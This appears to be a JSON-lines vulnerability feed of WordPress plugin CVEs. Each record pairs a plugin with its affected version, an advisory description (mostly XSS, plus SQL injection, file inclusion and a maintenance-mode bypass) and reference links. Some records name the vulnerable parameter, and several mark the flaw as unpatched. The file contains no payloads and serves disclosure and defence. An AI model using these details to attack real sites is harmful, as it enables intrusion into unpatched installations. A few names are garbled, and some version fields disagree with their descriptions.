{"CVE_ID":"CVE-2023-2184","slug":"responsive-horizontal-vertical-and-accordion-tabs","versionImpact":"1.1.15","description":"The WP Responsive Tabs horizontal vertical and accordion Tabs plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the search_term parameter in versions up to, and including, 1.1.15 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2825016%40responsive-horizontal-vertical-and-accordion-tabs%2Ftags%2F1.1.15&new=2900990%40responsive-horizontal-vertical-and-accordion-tabs%2Ftags%2F1.1.16\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=2825016%40responsive-horizontal-vertical-and-accordion-tabs%2Ftags%2F1.1.15&new=2900990%40responsive-horizontal-vertical-and-accordion-tabs%2Ftags%2F1.1.16\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe54c37f-1421-48aa-b502-045847d13ae3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fe54c37f-1421-48aa-b502-045847d13ae3?source=cve\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1391","slug":"addon-elements-for-elementor-page-builder","versionImpact":"1.12.12","description":"The Elementor Addon Elements plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018eae_custom_overlay_switcher\u2019 attribute of the Thumbnail Slider widget in all versions up to, and including, 1.12.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/977bab12-969d-4b15-9942-2b17c8541f61?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/977bab12-969d-4b15-9942-2b17c8541f61?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/bg-slider\\\/module.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.12.12\\\/modules\\\/bg-slider\\\/module.php#L255\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/bg-slider\\\/module.php#L255\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/addon-elements-for-elementor-page-builder\\\/tags\\\/1.13\\\/modules\\\/bg-slider\\\/module.php#L255\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7317","slug":"folders","versionImpact":"3.0.3","description":"The Folders \u2013 Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 3.0.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2a2c069-5dc6-45e2-8ca1-842759d541c4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c2a2c069-5dc6-45e2-8ca1-842759d541c4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folders\\\/tags\\\/3.0.3\\\/includes\\\/media.replace.php#L1296\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/folders\\\/tags\\\/3.0.3\\\/includes\\\/media.replace.php#L1296\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/folders\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/folders\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130880\\\/#file25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130880\\\/#file25\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130880\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3130880\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-7611","slug":"enteraddons","versionImpact":"2.1.8","description":"The Enter Addons \u2013 Ultimate Template Builder for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'tag' attribute of the Events Card widget in all versions up to, and including, 2.1.8 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7580145-03da-4aff-b804-39125e7daad1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f7580145-03da-4aff-b804-39125e7daad1?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enteraddons\\\/trunk\\\/widgets\\\/events_card\\\/traits\\\/Templates_Components.php#L25\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/enteraddons\\\/trunk\\\/widgets\\\/events_card\\\/traits\\\/Templates_Components.php#L25\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8288","slug":"guten-post-layout","versionImpact":"1.2.4","description":"The Guten Post Layout \u2013 An Advanced Post Grid Collection for WordPress Gutenberg plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019 attribute within the 'wp:guten-post-layout\/post-grid' Gutenberg block in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d6d9852-424a-4d98-9926-e849bef99c2d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5d6d9852-424a-4d98-9926-e849bef99c2d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guten-post-layout\\\/trunk\\\/src\\\/blocks\\\/post-grid\\\/post-grid.php#L300\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guten-post-layout\\\/trunk\\\/src\\\/blocks\\\/post-grid\\\/post-grid.php#L300\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/guten-post-layout\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/guten-post-layout\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guten-post-layout\\\/trunk\\\/src\\\/blocks\\\/post-grid\\\/post-grid.php#L27\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/guten-post-layout\\\/trunk\\\/src\\\/blocks\\\/post-grid\\\/post-grid.php#L27\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11231","slug":"mshop-npay","versionImpact":"3.3.7","description":"The ???? ????? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's mnp_purchase shortcode in all versions up to, and including, 3.3.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-npay\\\/trunk\\\/templates\\\/shortcodes\\\/naverpay-button.php#L6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-npay\\\/trunk\\\/templates\\\/shortcodes\\\/naverpay-button.php#L6\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191814\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3191814\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mshop-npay\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/mshop-npay\\\/#developers\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dab587c3-54f3-4619-8de0-8740d6451f96?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dab587c3-54f3-4619-8de0-8740d6451f96?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11430","slug":"sql-chart-builder","versionImpact":"2.3.7.1","description":"The SQL Chart Builder plugin for WordPress is vulnerable to SQL Injection via the 'arg1' arg of the 'gvn_schart_2' shortcode in all versions up to, and including, 2.3.6 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sql-chart-builder\\\/tags\\\/2.3.6\\\/functions.php#L469\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sql-chart-builder\\\/tags\\\/2.3.6\\\/functions.php#L469\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f818aad-8d05-4665-a7dc-50bc56cbde5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1f818aad-8d05-4665-a7dc-50bc56cbde5f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13400","slug":"kona-instagram-feed-for-gutenberg","versionImpact":"1.7","description":"The Kona Gallery Block plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"Kona: Instagram for Gutenberg\" Block, specifically in the \"align\" attribute, in all versions up to, and including, 1.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kona-instagram-feed-for-gutenberg\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/kona-instagram-feed-for-gutenberg\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e90045df-deb5-41ab-a285-c6b1573ae0f6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e90045df-deb5-41ab-a285-c6b1573ae0f6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13609","slug":"1-click-migration","versionImpact":"2.2","description":"The 1 Click WordPress Migration Plugin \u2013 100% FREE for a limited time plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.1 via the class-ocm-backup.php. This makes it possible for unauthenticated attackers to extract sensitive data including usernames and their respective password hashes during a short window of time in which the backup is in process.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-click-migration\\\/trunk\\\/inc\\\/backup\\\/class-ocm-backup.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/1-click-migration\\\/trunk\\\/inc\\\/backup\\\/class-ocm-backup.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d33199ea-7c96-4c60-a7b8-5c7e9835e231?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d33199ea-7c96-4c60-a7b8-5c7e9835e231?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-39409","slug":"wp-video-robot","versionImpact":"1.20.0","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in pressaholic WordPress Video Robot - The Ultimate Video Importer.This issue affects WordPress Video Robot - The Ultimate Video Importer: from n\/a through 1.20.0.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-video-robot\\\/vulnerability\\\/wordpress-wordpress-video-robot-the-ultimate-video-importer-plugin-1-20-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/wordpress\\\/plugin\\\/wp-video-robot\\\/vulnerability\\\/wordpress-wordpress-video-robot-the-ultimate-video-importer-plugin-1-20-0-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0146","slug":"naver-map","versionImpact":"1.1.0","description":"The Naver Map WordPress plugin through 1.1.0 does not validate and escape some of its shortcode attributes before outputting them back in a page\/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1218c69-4f6a-4b2d-a537-5cc16a46ba7b\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d1218c69-4f6a-4b2d-a537-5cc16a46ba7b\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-0520","slug":"rapidexpcart","versionImpact":"1.0","description":"The RapidExpCart WordPress plugin through 1.0 does not sanitize and escape the url parameter in the rapidexpcart endpoint before storing it and outputting it back in the page, leading to a Stored Cross-Site Scripting vulnerability which could be used against high-privilege users such as admin, furthermore lack of csrf protection means an attacker can trick a logged in admin to perform the attack by submitting a hidden form.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be4f7ff9-af79-477b-9f47-e40e25a3558e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be4f7ff9-af79-477b-9f47-e40e25a3558e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2159","slug":"cmp-coming-soon-maintenance","versionImpact":"4.1.7","description":"The CMP \u2013 Coming Soon & Maintenance plugin for WordPress is vulnerable to Maintenance Mode Bypass in versions up to, and including, 4.1.7. A correct cmp_bypass GET parameter in the URL (equal to the md5-hashed home_url in the default setting) allows users to visit a site placed in maintenance mode thus bypassing the plugin's provided feature.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2900571\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.8\\\/cmp-advanced.php?old=2873620&old_path=cmp-coming-soon-maintenance%2Ftags%2F4.1.7%2Fcmp-advanced.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2900571\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.8\\\/cmp-advanced.php?old=2873620&old_path=cmp-coming-soon-maintenance%2Ftags%2F4.1.7%2Fcmp-advanced.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af955f69-b18c-446e-b05e-6a57a5f16dfa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/af955f69-b18c-446e-b05e-6a57a5f16dfa?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.6\\\/niteo-cmp.php#L808\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/cmp-coming-soon-maintenance\\\/tags\\\/4.1.6\\\/niteo-cmp.php#L808\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2021-24433","slug":"simple-sortsearch","versionImpact":"0.0.3","description":"The simple sort&search WordPress plugin through 0.0.3 does not make sure that the indexurl parameter of the shortcodes \"category_sims\", \"order_sims\", \"orderby_sims\", \"period_sims\", and \"tag_sims\" use allowed URL protocols, which can lead to stored cross-site scripting by users with a role as low as Contributor","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ce8c786-ba82-427c-b5e7-e3b300a24c5f\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2ce8c786-ba82-427c-b5e7-e3b300a24c5f\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1791","slug":"wp-codemirror-block","versionImpact":"1.2.4","description":"The CodeMirror Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Code Mirror block in all versions up to, and including, 1.2.4 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52569aac-1e9e-40fb-9ff4-5eeb7940375d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/52569aac-1e9e-40fb-9ff4-5eeb7940375d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-codemirror-block\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-codemirror-block\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4608","slug":"sellkit","versionImpact":"1.9.8","description":"The SellKit \u2013 Funnel builder and checkout optimizer for WooCommerce to sell more, faster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' parameter in all versions up to, and including, 1.9.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fbb31a5-9ed2-445a-b309-a9835128eb44?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9fbb31a5-9ed2-445a-b309-a9835128eb44?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/fields\\\/acceptance.php#L31\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/fields\\\/acceptance.php#L31\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/fields\\\/field-base.php#L304\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/fields\\\/field-base.php#L304\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/widgets\\\/optin.php#L48\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/sellkit\\\/trunk\\\/includes\\\/elementor\\\/modules\\\/optin\\\/widgets\\\/optin.php#L48\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5503","slug":"wp-blog-post-layouts","versionImpact":"1.1.3","description":"The WP Blog Post Layouts plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 1.1.3. This makes it possible for authenticated attackers, with Contributor-level access and above, to include and execute arbitrary PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other \u201csafe\u201d file types can be uploaded and included.","recommendation":"No known patch available. Please review the vulnerability's details in depth and employ mitigations based on your organization's risk tolerance. It may be best to uninstall the affected software and find a replacement.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5205cc95-06d1-4bc6-a9ea-082df9566935?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5205cc95-06d1-4bc6-a9ea-082df9566935?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L883\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L883\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L900\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L900\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L917\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/gutenberg.php#L917\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/grid\\\/element.php#L1146\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/grid\\\/element.php#L1146\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/list\\\/element.php#L1136\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/list\\\/element.php#L1136\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/masonry\\\/element.php#L1134\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-blog-post-layouts\\\/trunk\\\/includes\\\/src\\\/masonry\\\/element.php#L1134\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9304","slug":"locateandfilter","versionImpact":"1.6.14","description":"The LocateAndFilter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.6.14 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a10ee67a-7f5f-43dd-8f5c-c0e92706c453?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a10ee67a-7f5f-43dd-8f5c-c0e92706c453?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/locateandfilter\\\/#developers\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/locateandfilter\\\/#developers\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2019-25218","slug":"wp-responsive-photo-gallery","versionImpact":"1.0.3","description":"The Photo Gallery Slideshow & Masonry Tiled Gallery plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 1.0.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for authenticated attackers, with Administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05ff1b1e-f7ba-485d-9421-9bb38f6831ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/05ff1b1e-f7ba-485d-9421-9bb38f6831ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-photo-gallery\\\/\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/wp-responsive-photo-gallery\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.3\\\/wp-responsive-photo-gallery.php#L1393\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.3\\\/wp-responsive-photo-gallery.php#L1393\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.4\\\/wp-responsive-photo-gallery.php#L1614\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-responsive-photo-gallery\\\/tags\\\/1.0.4\\\/wp-responsive-photo-gallery.php#L1614\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11229","slug":"mshop-naver-talktalk","versionImpact":"1.1.18","description":"The ???? ??? plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's add_plus_friends and add_plus_talk shortcodes in all versions up to, and including, 1.1.18 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L168\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L168\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L215\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L215\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L22\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/trunk\\\/includes\\\/class-msntt-plus-friends.php#L22\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mshop-naver-talktalk\\\/